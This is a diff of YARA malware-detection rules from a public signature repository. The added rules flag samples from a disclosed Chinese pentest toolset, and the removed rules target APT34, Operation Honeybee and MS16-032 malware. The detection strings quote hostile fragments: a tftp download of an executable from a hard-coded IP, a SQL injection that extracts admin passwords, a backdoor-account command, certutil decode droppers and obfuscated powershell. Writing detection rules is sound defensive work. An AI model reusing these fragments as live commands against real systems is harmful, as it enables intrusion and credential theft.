+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L102-L119"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
+		logic_hash = "91ceec96297e5cc027e261fd708899787b9be4ac15e209e0734a3b8563ae31b5"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "\\\\localhost" fullword ascii
+		$s1 = "iis.run" fullword ascii
+		$s3 = ">Could not connecto %s" fullword ascii
+		$s4 = "WinSta0\\Default" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Segmentweapon : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L121-L136"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
+		logic_hash = "9afb70a3ae158b7abbda6725b8c9901121b78fa0e874db12b4ac08bf59b26fb5"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii
+		$s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Alien_Iispwd : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L138-L153"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
+		logic_hash = "16dc6ec4b668fdc43e3a9a8ea31ad0caa1a80b1015ab60eec0eb76bfacd69c5f"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii
+		$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii
+
+	condition:
+		filesize < 3KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Md5Cracktools : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L155-L170"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
+		logic_hash = "a176393c0324bcc634a31c261aa6b528fb5a5893c40a5534b34253a1922c8285"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
+		$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 4580KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Coolscan_Scan : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file scan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "781446d2-3363-56c3-9767-c7ac70047b68"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L172-L187"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
+		logic_hash = "89c7d24d821e907f79ab5630eed13275c5216cff6bf203b5c8f66bb1a178039b"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "User-agent:\\s{0,32}(huasai|huasai/1.0|\\*)" fullword ascii
+		$s1 = "scan web.exe" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 3680KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Mempodipper2_6 : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file mempodipper2.6.39"
+		author = "Florian Roth (Nextron Systems)"
+		id = "43a27968-adab-5f27-9b8c-8f0f895f0576"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L189-L203"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "ba2c79911fe48660898039591e1742b3f1a9e923"
+		logic_hash = "1a2c42757199818b94a73b9faff3380911655992ef3214a33a220eac15850c4b"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "objdump -d /bin/su|grep '<exit@plt>'|head -n 1|cut -d ' ' -f 1|sed" ascii
+
+	condition:
+		filesize < 30KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_COOKIE_Cookie : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file CooKie.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5f85bb0f-6df2-512c-ba1a-8a74c1a55563"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L205-L220"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "f7727160257e0e716e9f0cf9cdf9a87caa986cde"
+		logic_hash = "6d942e53a253cb157e535f86ca457c93a6039b2c5ebb3969dc3e271242b478d4"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s4 = "-1 union select 1,username,password,4,5,6,7,8,9,10 from admin" fullword ascii
+		$s5 = "CooKie.exe" fullword wide
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 360KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Wwwscan_1_Wwwscan : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8b6a94a3-6f9c-59b2-931b-c06701b95d59"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L222-L237"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "6bed45629c5e54986f2d27cbfc53464108911026"
+		logic_hash = "7b0b6bbcba49c8f950ea3cf5a364059ba784c87a41eba6d825a9ca4e3a07bfbc"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii
+		$s3 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_D_Injection_V2_32 : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file D_injection_V2.32.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4c661c35-61ee-5ee7-9b8e-9908fbe0362b"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L239-L254"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "3a000b976c79585f62f40f7999ef9bdd326a9513"
+		logic_hash = "0107903a481b09faa92a5fbb162fd981f976ed864be3a0840b43063461e20974"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "Missing %s property(CommandText does not return a result set{Error creating obje" wide
+		$s1 = "/tftp -i 219.134.46.245 get 9493.exe c:\\9394.exe" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Net_Priv_Esc2 : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file net-priv-esc2.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b4fa3129-57a3-55ee-8ca6-ecbcc135184e"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L256-L271"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "4851e0088ad38ac5b3b1c75302a73698437f7f17"
+		logic_hash = "53cf3d984bc82428eb0a6ee416bcd5429718a1d615ce1c1ba399cda42268d26c"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "Usage:%s username password" fullword ascii
+		$s2 = "<www.darkst.com>" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 17KB and all of them
+}
+rule SIGNATURE_BASE_CN_Honker_Oracle_V1_0_Oracle : FILE
+{
+	meta:
+		description = "Sample from CN Honker Pentest Toolset - file Oracle.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0cebede9-f4ff-5efb-98bc-55df0ad656a3"
+		date = "2015-06-23"
+		modified = "2023-12-05"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L273-L289"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		hash = "0264f4efdba09eaf1e681220ba96de8498ab3580"
+		logic_hash = "6f1bb6b14445a9ca29768ab2dcf831a98cb5d153d03ebc4bc497bb8f8144a365"
+		score = 70
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread)))" ascii
-		$x2 = "0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\"," fullword ascii
-		$x3 = "PowerShell implementation of MS16-032. The exploit targets all vulnerable" fullword ascii
-		$x4 = "If we can't open the process token it's a SYSTEM shell!" fullword ascii
+		$s1 = "!http://localhost/index.asp?id=zhr" fullword ascii
+		$s2 = "OnGetPassword" fullword ascii
+		$s3 = "Mozilla/3.0 (compatible; Indy Library)" fullword ascii
 
 	condition:
-		( filesize < 40KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3455KB and all of them
 }
-
-rule SIGNATURE_BASE_Imphash_UPX_Packed_Malware_1_TA17_293A : FILE
+rule SIGNATURE_BASE_CN_Honker_Interception : FILE
 {
 	meta:
-		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		description = "Sample from CN Honker Pentest Toolset - file Interception.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3ff28f06-8b69-5e8f-ab45-dfa4f6e69812"
-		date = "2017-10-21"
+		id = "40d350e5-c6af-58e2-a1d8-f9516af5f869"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_293A.yar#L206-L217"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L291-L306"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "398ccbd5e492fb1efa80dc07900ef77611c4b5bab95f715fce7b5dbeb0aff49d"
-		score = 75
+		hash = "ea813aed322e210ea6ae42b73b1250408bf40e7a"
+		logic_hash = "d1ae5f8ff21659b95f6e62b1d5e3ec15b122a2b5889e8984f3d9f6d2fa938d17"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a278256fbf2f061cfded7fdd58feded6765fade730374c508adad89282f67d77"
+
+	strings:
+		$s2 = ".\\dat\\Hookmsgina.dll" fullword ascii
+		$s5 = "WinlogonHackEx " fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "d7d745ea39c8c5b82d5e153d3313096c" )
+		uint16( 0 ) == 0x5a4d and filesize < 160KB and all of them
 }
-
-rule SIGNATURE_BASE_Imphash_Malware_2_TA17_293A : HIGHVOL FILE
+rule SIGNATURE_BASE_CN_Honker_Sig_3389_Dubrute_V3_0_RC3_3_0 : FILE
 {
 	meta:
-		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		description = "Sample from CN Honker Pentest Toolset - file 3.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c9f32a3-8c50-5d46-929b-bbe14697540e"
-		date = "2017-10-21"
+		id = "994ad7e9-2019-54b3-84e6-2762a700c939"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ta17_293A.yar#L219-L229"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L308-L324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5f91c07a9cc65c31eb9fd09bdd2752bc285c5a4b118ffe647391f7d187765de4"
-		score = 75
+		hash = "49b311add0940cf183e3c7f3a41ea6e516bf8992"
+		logic_hash = "6d2f6721c942332af1be0b6537e9b9d0b5b3e91eb3912dcd095aa18bccfc4ad5"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
+	strings:
+		$s0 = "explorer.exe http://bbs.yesmybi.net" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s9 = "CryptGenRandom" fullword ascii
+
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "a8f69eb2cf9f30ea96961c86b4347282" )
+		uint16( 0 ) == 0x5a4d and filesize < 395KB and all of them
 }
-rule SIGNATURE_BASE_Honeybee_Dropper_Maldoc : FILE
+rule SIGNATURE_BASE_CN_Honker_Windows_Exp : FILE
 {
 	meta:
-		description = "Detects samples from Operation Honeybee"
+		description = "Sample from CN Honker Pentest Toolset - file exp.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e8dec29-2c0a-5760-91c9-88f67505a7f1"
-		date = "2018-03-03"
+		id = "148900d0-cf62-5cb0-adbc-52fa8ce8832e"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L13-L35"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L326-L341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8bc680a59a7bd269eea001c2c74e41ecd93a9b848210779fc7d9c24dfab7767a"
-		score = 75
+		hash = "04334c396b165db6e18e9b76094991d681e6c993"
+		logic_hash = "6a146545fd12e7603bf1e2ccb9b2d308b13fe2acdb9248a79c80b6c1de37fd73"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "86981680172bbf0865e7693fe5a2bbe9b3ba12b3f1a1536ef67915daab78004c"
-		hash2 = "0d4352322160339f87be70c2f3fe096500cfcdc95a8dea975fdfc457bd347c44"
 
 	strings:
-		$x1 = "cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32"
-		$x2 = "del /f /q %TEMP%\\setup.cab && cliconfg.exe"
-		$s1 = "SELECT * FROM Win32_Processor" fullword ascii
-		$s2 = "\"cmd /c `wusa " fullword ascii
-		$s3 = "sTempPathP" fullword ascii
-		$s4 = "sTempFile" fullword ascii
-		$s5 = "GetObjectz" fullword ascii
-		$s6 = "\\setup.cab" ascii
+		$s0 = "c:\\windows\\system32\\command.com /c " fullword ascii
+		$s8 = "OH,Sry.Too long command." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 400KB and ( 1 of ( $x* ) or 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-
-rule SIGNATURE_BASE_Ophoneybee_Malware_1 : FILE
+rule SIGNATURE_BASE_CN_Honker_Safe3Wvs_Cgiscan : FILE
 {
 	meta:
-		description = "Detects malware from Operation Honeybee"
+		description = "Sample from CN Honker Pentest Toolset - file cgiscan.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5f48434e-efe6-5cd8-85e2-eabf528e6c58"
-		date = "2018-03-03"
+		id = "a9f7a195-deb8-5887-bc55-d1b0cac43182"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L37-L71"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L343-L358"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5cd37bc515bc1dd61ee58cfdf34622e4f884cc771d1fa2c793986be94b751a70"
-		score = 75
+		hash = "f94bbf2034ad9afa43cca3e3a20f142e0bb54d75"
+		logic_hash = "990dcede3bb83216af7e72e2a49bc2355ebd45ebd3fc658ba337a285dcdf799f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d31fe5cfa884e04ee26f323b8d104dcaa91146f5c7c216212fd3053afaade80f"
-		hash2 = "fc2bcd38659ae83fd25b4f7091412ae9ba011612fa4dcc3ef665b2cae2a1d74f"
-		hash3 = "2c5e5c86ca4fa172341c6bcbaa50984fb168d650ae9a33f2c6e6dccc1d57b369"
-		hash4 = "439c305cd408dbb508e153caab29d17021a7430f1dbaec0c90ac750ba2136f5f"
 
 	strings:
-		$x1 = "cmd /c taskkill /im cliconfg.exe /f /t && del /f /q" fullword ascii
-		$x2 = "\\FTPCom_vs10\\Release\\Engine.pdb" ascii
-		$x3 = "KXU/yP=B29tLzidqNRuf-SbVInw0oCrmWZk6OpFc7A5GTD1QxaJ3H8h4jMeEsYglv" fullword ascii
-		$x4 = "D:\\Task\\MiMul\\" ascii
-		$s1 = "[DLL_PROCESS_ATTACH]" fullword ascii
-		$s2 = "cmd /c systeminfo >%s" fullword ascii
-		$s3 = "post.txt" fullword ascii
-		$s4 = "\\temp.ini" ascii
-		$s5 = "[GetFTPAccountInfo_10001712]" fullword ascii
-		$s6 = "ComSysAppMutex" fullword ascii
-		$s7 = "From %s (%02d-%02d %02d-%02d-%02d).txt" fullword ascii
-		$s8 = "%s %s %c%s%c" fullword ascii
-		$s9 = "TO EVERYONE" fullword ascii
+		$s2 = "httpclient.exe" fullword wide
+		$s3 = "www.safe3.com.cn" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "e14b59a79999cc0bc589a4cb5994692a" or pe.imphash ( ) == "64400f452e2f60305c341e08f217b02c" or 1 of ( $x* ) or 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 357KB and all of them
 }
-rule SIGNATURE_BASE_Ophoneybee_Maocheng_Dropper : FILE
+rule SIGNATURE_BASE_CN_Honker_Pr_Debug : FILE
 {
 	meta:
-		description = "Detects MaoCheng dropper from Operation Honeybee"
+		description = "Sample from CN Honker Pentest Toolset - file debug.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b163e08e-3892-55f6-ae3e-30d2ba3f4310"
-		date = "2018-03-03"
+		id = "6d759818-b762-56f4-8475-82a7d18a659c"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/JAHZVL"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_honeybee.yar#L73-L86"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L360-L375"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "85bcde1d821c052636a75dce4d8c3753188dd7da5fce2b3401d51c02d1c2fa6b"
-		score = 75
+		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"
+		logic_hash = "0b7508e3a508adc9416f16549290e06468520c156dbd5192e5a352820586af9f"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "35904f482d37f5ce6034d6042bae207418e450f4"
 
 	strings:
-		$x1 = "\\MaoCheng\\Release\\" ascii
+		$s1 = "-->Got WMI process Pid: %d " ascii
+		$s2 = "This exploit will execute \"net user temp 123456 /add & net localg" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 820KB and all of them
 }
-rule SIGNATURE_BASE_Malware_JS_Powershell_Obfuscated : FILE
+rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V4_0 : FILE
 {
 	meta:
-		description = "Unspecified malware - file rechnung_3.js"
+		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v4.0.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7995dd3a-5942-5c48-9e50-64f4964249a7"
-		date = "2017-03-24"
+		id = "d41cbed5-a6e3-5165-a8c3-e0375c1ed75d"
+		date = "2015-06-23"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_javascript_powershell.yar#L2-L15"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L377-L392"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1dd745624971f10acb7911433f363b0cf20c8c45344f702d7f3549c58689b371"
-		score = 75
+		hash = "98f21f72c761e504814f0a7db835a24a2413a6c2"
+		logic_hash = "bd6f9b6e831573164fddf7f0188087eb0076410b77c9c06cfacadebe6a53b525"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3af15a2d60f946e0c4338c84bd39880652f676dc884057a96a10d7f802215760"
 
 	strings:
-		$x1 = "po\" + \"wer\" + \"sh\" + \"e\" + \"ll\";" fullword ascii
+		$s0 = "LOADER ERROR" fullword ascii
+		$s15 = "2011-2012 T00LS&RICES" fullword wide
 
 	condition:
-		filesize < 30KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 2077KB and all of them
 }
-rule SIGNATURE_BASE_APT34_Malware_HTA : FILE
+rule SIGNATURE_BASE_CN_Honker_Matrixay1073 : FILE
 {
 	meta:
-		description = "Detects APT 34 malware"
+		description = "Sample from CN Honker Pentest Toolset - file MatriXay1073.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "683faded-7e4b-5b2f-9f85-300db96ed9d1"
-		date = "2017-12-07"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt34.yar#L12-L32"
+		id = "23e73b89-f60e-5bc3-8974-15be16d7c408"
+		date = "2015-06-23"
+		modified = "2023-01-27"
+		reference = "Disclosed CN Honker Pentest Toolset"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L394-L412"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0bf9b988b3ef46df29e0f91c3ea186aaab8a1ccb79563e97521311bf2e1215d7"
-		score = 75
+		hash = "fef951e47524f827c7698f4508ba9551359578a5"
+		logic_hash = "e64cae48344e5dae8ec80b2897305a0b380340bdd2973eb0828582f18ef8bf2b"
+		score = 70
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f6fa94cc8efea0dbd7d4d4ca4cf85ac6da97ee5cf0c59d16a6aafccd2b9d8b9a"
 
 	strings:
-		$x1 = "WshShell.run \"cmd.exe /C C:\\ProgramData\\" ascii
-		$x2 = ".bat&ping 127.0.0.1 -n 6 > nul&wscript  /b" ascii
-		$x3 = "cmd.exe /C certutil -f  -decode C:\\ProgramData\\" ascii
-		$x4 = "a.WriteLine(\"set Shell0 = CreateObject(" ascii
-		$x5 = "& vbCrLf & \"Shell0.run" ascii
-		$s1 = "<title>Blog.tkacprow.pl: HTA Hello World!</title>" fullword ascii
-		$s2 = "<body onload=\"test()\">" fullword ascii
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1" ascii
+		$s1 = "Policy\\Scan\\GetUserLen.ini" fullword ascii
+		$s2 = "!YEL!Using http://127.0.0.1:%d/ to visiter https://%s:%d/" ascii
+		$s3 = "getalluserpasswordhash" fullword ascii
 
 	condition:
-		filesize < 60KB and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint16( 0 ) == 0x5a4d and filesize < 9100KB and all of them
 }
-rule SIGNATURE_BASE_APT34_Malware_Exeruner : FILE
+rule SIGNATURE_BASE_CN_Honker_Sword1_5 : FILE
 {
 	meta:
-		description = "Detects APT 34 malware"
+		description = "Sample from CN Honker Pentest Toolset - file Sword1.5.exe"
 		author = "Florian Roth (Nextron Systems)"
